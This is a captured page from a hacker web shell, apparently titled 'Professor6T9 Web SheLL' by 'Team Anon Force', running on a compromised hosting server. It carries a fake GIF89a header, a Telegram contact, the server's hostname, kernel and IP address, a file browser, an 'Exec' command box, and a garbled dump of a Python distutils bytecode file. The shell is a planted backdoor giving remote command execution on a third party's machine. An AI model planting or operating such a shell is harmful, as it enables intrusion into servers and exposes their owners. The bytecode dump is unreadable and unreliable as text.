GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux das102.truehost.cloud 4.18.0-553.8.1.lve.el8.x86_64 #1 SMP Thu Jul 4 16:24:39 UTC 2024 x86_64
LiteSpeed
156.232.88.2
/
opt
/
alt
/
python33
/
lib64
/
python3.3
/
distutils
/
__pycache__
[ HOME ]
Exec
Submit
dep_util.cpython-33.pyc
� ��f� c @ sM d Z d d l Z d d l m Z d d � Z d d � Z d d d � Z d S( u� distutils.dep_util Utility functions for simple, timestamp-based dependency of files and groups of files; also, function based entirely on such timestamp dependency analysis.i N( u DistutilsFileErrorc C s� t j j | � s1 t d t j j | � � � n t j j | � sG d Sd d l m } t j | � | } t j | � | } | | k S( u Return true if 'source' exists and is more recently modified than 'target', or if 'source' exists and 'target' doesn't. Return false if both exist and 'target' is the same age or younger than 'source'. Raise DistutilsFileError if 'source' does not exist. u file '%s' does not existi i ( u ST_MTIME( u osu pathu existsu DistutilsFileErroru abspathu statu ST_MTIME( u sourceu targetu ST_MTIMEu mtime1u mtime2( ( u7 /opt/alt/python33/lib64/python3.3/distutils/dep_util.pyu newer s u newerc C s� t | � t | � k r'